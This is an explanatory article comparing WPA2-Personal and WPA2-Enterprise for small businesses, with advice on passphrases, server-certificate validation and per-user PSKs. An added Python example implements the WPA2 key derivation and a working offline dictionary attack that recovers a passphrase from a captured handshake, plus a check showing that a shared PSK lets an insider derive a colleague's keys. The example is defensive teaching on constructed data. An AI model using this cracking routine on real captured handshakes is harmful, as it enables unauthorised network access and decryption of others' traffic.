What’s the best wireless network security for our small business wireless network?
In his SearchMidMarketSecurity tip "Enabling the best WiFi security for SMBs without hurting usability," Mike Chapple describes the two ways small businesses typically deploy WPA2: WPA2-Personal (PSK) and WPA2-Enterprise (802.1X). WPA2-Personal authenticates everyone on the WLAN with one shared passphrase, so the network learns that a client knows the secret but not who that client is. WPA2-Enterprise authenticates each user or device with its own credential, such as a machine certificate, a Windows username and password or a SecurID token, and derives a separate master key for every authenticated session.
As Mike noted, WPA2-Enterprise can be challenging for small businesses because it requires a RADIUS server linked to an account database that holds the user or device credentials, and every Wi-Fi client must then be configured to present its own credential to that server. Two implementation options make WPA2-Enterprise more palatable to SMBs: an AP or WLAN controller with an embedded RADIUS server, or a hosted (cloud-based) RADIUS service. These options fit many SMBs well, and the effort or cost is often worth it for the more robust, granular WLAN security they deliver: a single credential can be revoked without touching anyone else, and no user's keys are derived from a secret that other users know.
However, both still require configuring Wi-Fi clients (802.1X supplicants) with the Extensible Authentication Protocol (EAP) type the RADIUS server expects and with the certificate authority that issued the server's certificate, so the supplicant can verify that it is talking to your RADIUS server rather than to a rogue AP. That verification is the part that matters: a supplicant set to skip server certificate validation will offer its credentials (for PEAP/MSCHAPv2, a challenge-response that can be cracked offline) to any attacker who stands up an access point with your SSID and a look-alike RADIUS server. This configuration isn't rocket science, but it isn't as easy as typing a passphrase. Because the common EAP types (PEAP, EAP-TTLS, EAP-TLS) require at least a server certificate, 802.1X can be harder to configure on devices with limited GUIs, like smartphones or wireless printers. Finally, 802.1X problems can be a bear to troubleshoot.
SMBs that consider WPA2-Enterprise (802.1X) but conclude that they really cannot step up to it should know there are ways to make better, safer use of WPA2-Personal (PSK). For starters, PSK security depends almost entirely on the length and randomness of your chosen passphrase: the encryption keys are derived from the passphrase and the SSID alone, and anyone who records a client joining the network can test guesses offline at leisure. Use a mixed-case passphrase of at least 20 characters that contains no dictionary words, in conjunction with an unusual SSID; the SSID is the only salt in that derivation, so a common SSID lets attackers reuse tables precomputed for it. To test the strength of a WPA2-Personal passphrase, run a candidate through an on-line WPA Cracker, or through an offline cracking tool against a handshake captured from a test SSID, but do not submit the passphrase you actually deploy to a third-party service.
However, even a strong passphrase is still exposed to shared-secret risks: giving the passphrase to someone who shouldn't have it, or having to change it on every device when an employee is fired or loses a laptop. A shared PSK also means that anyone who knows it and captures a colleague's handshake can derive that colleague's session keys and decrypt their traffic. To address these concerns, consider using APs that support dynamic per-user passphrases. The 802.11 standard only requires that the AP and a given client agree on the same master key; it does not require every client to use the same PSK, and some vendors have capitalized on this by issuing a unique passphrase to every user. Per-user passphrases deter insider attacks (like decrypting other users' traffic), and one user's passphrase can be revoked without re-keying everyone else. Dynamic per-user passphrases can also be time-bounded, so that guests only have access for a limited period. Some implementations even let visitors or helpdesks register for dynamic passphrases, simplifying generation and distribution. To learn more, check out Aerohive's Private PSK and Ruckus' Dynamic PSK solutions.
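The two PSK points above, that passphrase strength and an unusual SSID are what protect a WPA2-Personal network from offline guessing, and that a shared passphrase lets one insider derive another station's keys, both follow from the standard WPA2-Personal key derivation. The following Python is an added example written for this page, not code from the original article or from any vendor named in it. It implements the IEEE 802.11 PSK-to-PMK mapping (PBKDF2-HMAC-SHA1 with the SSID as salt), the PTK derivation from the 4-way handshake, and the EAPOL-Key MIC check that every WPA cracker uses to test a guess. The SSID, MAC addresses, nonces, EAPOL stand-in frame and candidate passphrases are constructed test data, not a real capture.

```python
import hashlib
import hmac

# Added example, not code from the original article. It implements the standard
# WPA2-Personal key derivation (IEEE 802.11 PSK -> PMK -> PTK and the EAPOL-Key MIC)
# to show (a) why passphrase length and an unusual SSID matter and (b) why a shared
# PSK lets one insider derive another station's keys. SSID, MAC addresses, nonces,
# the EAPOL stand-in and the candidate passphrases below are constructed test data.


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PSK-to-PMK mapping: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The SSID is the only salt, so 4096 SHA-1 rounds per guess is the whole cost an
    offline cracker pays, and tables precomputed for a common SSID skip even that."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11 PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || i), i = 0, 1, ..."""
    out, i = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-384(PMK, "Pairwise key expansion", Min(AA,SPA)||Max(AA,SPA)||Min(ANonce,SNonce)||Max(ANonce,SNonce)).
    Every input except the PMK is sent in the clear during the 4-way handshake.
    For CCMP the 48 bytes are KCK (0:16), KEK (16:32) and the temporal key TK (32:48)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def key_mic(kck: bytes, eapol_key_frame: bytes) -> bytes:
    """WPA2 EAPOL-Key MIC (AKM 2): HMAC-SHA1 over the frame with its MIC field zeroed, truncated to 16 bytes."""
    return hmac.new(kck, eapol_key_frame, hashlib.sha1).digest()[:16]


# --- constructed 4-way handshake between an AP (AA) and one laptop (SPA) on the office WLAN ---
SSID = "acme-office"
AA = bytes.fromhex("001122334455")
SPA = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
EAPOL_MSG2 = b"\x02\x03\x00\x75\x02\x01\x0a" + bytes(8) + SNONCE + bytes(56)  # stand-in for message 2, MIC zeroed


def capture_handshake(passphrase: str) -> dict:
    """What a sniffer sees: SSID, MACs, nonces, the EAPOL frame and the MIC the laptop actually sent."""
    ptk = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), AA, SPA, ANONCE, SNONCE)
    return {"ssid": SSID, "aa": AA, "spa": SPA, "anonce": ANONCE, "snonce": SNONCE,
            "eapol": EAPOL_MSG2, "mic": key_mic(ptk[:16], EAPOL_MSG2)}


def passphrase_matches(capture: dict, candidate: str) -> bool:
    """One offline guess: candidate -> PMK -> PTK -> KCK, then compare the recomputed MIC with the captured one."""
    pmk = pmk_from_passphrase(candidate, capture["ssid"])
    ptk = ptk_from_pmk(pmk, capture["aa"], capture["spa"], capture["anonce"], capture["snonce"])
    return hmac.compare_digest(key_mic(ptk[:16], capture["eapol"]), capture["mic"])


def dictionary_attack(capture: dict, candidates):
    """The loop every WPA cracker runs: the wordlist is the attacker's, the per-guess cost is 4096 SHA-1 rounds."""
    for candidate in candidates:
        if passphrase_matches(capture, candidate):
            return candidate
    return None


def insider_can_decrypt(insider_passphrase: str, victim_passphrase: str) -> bool:
    """Can a user who knows insider_passphrase derive a colleague's TK from the colleague's captured handshake?
    With a shared PSK both passphrases are the same and the answer is yes; with per-user PSKs it is no."""
    victim_tk = ptk_from_pmk(pmk_from_passphrase(victim_passphrase, SSID), AA, SPA, ANONCE, SNONCE)[32:]
    guess_tk = ptk_from_pmk(pmk_from_passphrase(insider_passphrase, SSID), AA, SPA, ANONCE, SNONCE)[32:]
    return guess_tk == victim_tk


if __name__ == "__main__":
    cap = capture_handshake("Summer2011")
    print("weak passphrase recovered:", dictionary_attack(cap, ["password", "Summer2010", "Summer2011"]))
    print("shared PSK, insider derives colleague's TK:", insider_can_decrypt("Summer2011", "Summer2011"))
    print("per-user PSK, insider derives colleague's TK:", insider_can_decrypt("Summer2011", "r8#Lq2vWm0Zt!cG5pXy7"))
```

`pmk_from_passphrase("password", "IEEE")` reproduces the published IEEE 802.11 test vector, which is a quick way to confirm the derivation before trusting the rest. Note that `dictionary_attack` needs nothing but the wordlist and a single recorded handshake, which is exactly why the passphrase length advice above is not optional; and that `insider_can_decrypt` flips from true to false the moment two users hold different passphrases, which is the property the per-user PSK products in the text are selling.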
This was first published in January 2011